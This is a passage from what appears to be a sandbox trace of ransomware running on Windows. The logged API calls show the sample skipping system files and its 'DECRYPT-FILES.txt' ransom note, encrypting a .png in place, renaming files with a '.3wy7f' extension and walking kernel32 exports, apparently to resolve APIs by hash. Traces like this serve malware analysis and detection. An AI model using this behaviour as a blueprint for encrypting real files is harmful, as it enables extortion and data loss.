(in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.092] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.092] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.092] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.092] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.092] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.092] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png") returned 54 [0077.092] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png.3wy7f") returned 60 [0077.092] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ebf4.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ebf4.png.3wy7f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ebf4.png.3wy7f"), dwFlags=0x0) returned 1 [0077.093] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.093] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.094] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.094] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34a639f0, ftCreationTime.dwHighDateTime=0x1d4ce33, ftLastAccessTime.dwLowDateTime=0x2a4e0890, ftLastAccessTime.dwHighDateTime=0x1d4c5d5, ftLastWriteTime.dwLowDateTime=0x2a4e0890, ftLastWriteTime.dwHighDateTime=0x1d4c5d5, nFileSizeHigh=0x0, nFileSizeLow=0xea1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="egrSO1kCzE_TcvnPlFJT.png", cAlternateFileName="EGRSO1~1.PNG")) returned 1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="DECRYPT-FILES.txt") returned 1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="autorun.inf") returned 1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="boot.ini") returned 1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="desktop.ini") returned 1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="ntuser.dat") returned -1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="iconcache.db") returned -1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="bootsect.bak") returned 1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="ntuser.dat.log") returned -1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="thumbs.db") returned -1 [0077.094] lstrcmpiW (lpString1="egrSO1kCzE_TcvnPlFJT.png", lpString2="Bootfont.bin") returned 1 [0077.094] lstrlenW (lpString="egrSO1kCzE_TcvnPlFJT.png") returned 24 [0077.094] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0077.094] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0077.094] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0077.094] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0077.094] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.094] lstrlenW (lpString="egrSO1kCzE_TcvnPlFJT.png") returned 24 [0077.094] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.094] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="egrSO1kCzE_TcvnPlFJT.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png" [0077.094] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\egrSO1kCzE_TcvnPlFJT.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\egrso1kcze_tcvnplfjt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0077.095] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=59934) returned 1 [0077.095] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0077.095] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0077.095] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0077.095] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0077.095] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.097] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0077.097] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0077.098] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.098] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0077.099] CloseHandle (hObject=0x444) returned 1 [0077.099] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.099] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0077.100] CloseHandle (hObject=0x0) returned 0 [0077.100] CloseHandle (hObject=0x440) returned 1 [0077.101] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.101] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.101] GetTickCount () returned 0x114bc8c [0077.101] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.102] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0077.102] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0077.102] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0077.102] lstrlenA (lpString="kernel32.dll") returned 12 [0077.102] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0077.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0077.102] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0077.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0077.102] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0077.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0077.102] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0077.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0077.102] lstrlenA (lpString="ADDATOMA") returned 8 [0077.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0077.103] lstrlenA (lpString="ADDATOMW") returned 8 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0077.103] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0077.103] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0077.103] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0077.103] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0077.103] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0077.103] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0077.103] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0077.103] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0077.103] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0077.103] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0077.103] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0077.103] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0077.103] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0077.103] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0077.103] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0077.103] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0077.103] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0077.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0077.104] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0077.104] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0077.104] lstrlenA (lpString="BACKUPREAD") returned 10 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0077.104] lstrlenA (lpString="BACKUPSEEK") returned 10 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0077.104] lstrlenA (lpString="BACKUPWRITE") returned 11 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0077.104] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0077.104] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0077.104] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0077.104] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0077.104] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0077.104] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0077.104] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0077.104] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0077.104] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0077.104] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0077.104] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0077.104] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0077.104] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0077.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0077.105] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0077.105] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0077.105] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0077.105] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0077.105] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0077.105] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0077.105] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0077.105] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0077.105] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0077.105] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0077.105] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0077.105] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0077.105] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0077.105] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0077.105] lstrlenA (lpString="BEEP") returned 4 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0077.105] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0077.105] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0077.105] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0077.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0077.106] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0077.106] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0077.106] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0077.106] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0077.106] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.106] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.106] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.106] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.106] lstrlenA (lpString="CANCELIO") returned 8 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.106] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.106] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.106] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.106] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.106] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.106] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.106] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.106] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.106] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.106] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.107] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.107] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.107] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.107] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.107] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.107] lstrcpyA (in: 